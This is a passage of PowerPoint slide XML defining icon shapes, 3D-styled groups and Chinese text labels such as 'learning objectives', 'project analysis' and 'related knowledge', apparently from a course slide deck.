                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="328308"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10794 23"/>
                    <a:gd name="T1" fmla="*/ T0 w 21543"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T3" fmla="+- 0 10794 23"/>
                    <a:gd name="T4" fmla="*/ T3 w 21543"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T6" fmla="+- 0 10794 23"/>
                    <a:gd name="T7" fmla="*/ T6 w 21543"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T9" fmla="+- 0 10794 23"/>
                    <a:gd name="T10" fmla="*/ T9 w 21543"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T7" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21543" h="21600">
                      <a:moveTo>
                        <a:pt x="16976" y="19986"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11226" y="17680"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="11088" y="17626"/>
                        <a:pt x="10946" y="17608"/>
                        <a:pt x="10806" y="17600"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19660" y="3837"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="19660" y="3837"/>
                        <a:pt x="16976" y="19986"/>
                        <a:pt x="16976" y="19986"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="6859" y="16244"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6858" y="16242"/>
                        <a:pt x="6855" y="16240"/>
                        <a:pt x="6854" y="16238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19606" y="2552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8735" y="19536"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8735" y="19536"/>
                        <a:pt x="6859" y="16244"/>
                        <a:pt x="6859" y="16244"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2111" y="14024"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17712" y="3595"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6369" y="15770"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6309" y="15734"/>
                        <a:pt x="6256" y="15687"/>
                        <a:pt x="6190" y="15660"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6190" y="15660"/>
                        <a:pt x="2111" y="14024"/>
                        <a:pt x="2111" y="14024"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="21234" y="108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21123" y="35"/>
                        <a:pt x="20996" y="0"/>
                        <a:pt x="20868" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20738" y="0"/>
                        <a:pt x="20608" y="36"/>
                        <a:pt x="20495" y="113"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="299" y="13613"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="13751"/>
                        <a:pt x="-23" y="13995"/>
                        <a:pt x="3" y="14244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="14494"/>
                        <a:pt x="190" y="14708"/>
                        <a:pt x="422" y="14801"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5689" y="16914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8166" y="21259"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8284" y="21468"/>
                        <a:pt x="8505" y="21597"/>
                        <a:pt x="8743" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8751" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8987" y="21599"/>
                        <a:pt x="9206" y="21474"/>
                        <a:pt x="9328" y="21271"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10726" y="18934"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17253" y="21551"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="17332" y="21584"/>
                        <a:pt x="17418" y="21599"/>
                        <a:pt x="17502" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17617" y="21599"/>
                        <a:pt x="17731" y="21571"/>
                        <a:pt x="17832" y="21512"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18010" y="21412"/>
                        <a:pt x="18133" y="21238"/>
                        <a:pt x="18167" y="21035"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21533" y="785"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21576" y="520"/>
                        <a:pt x="21459" y="254"/>
                        <a:pt x="21234" y="108"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
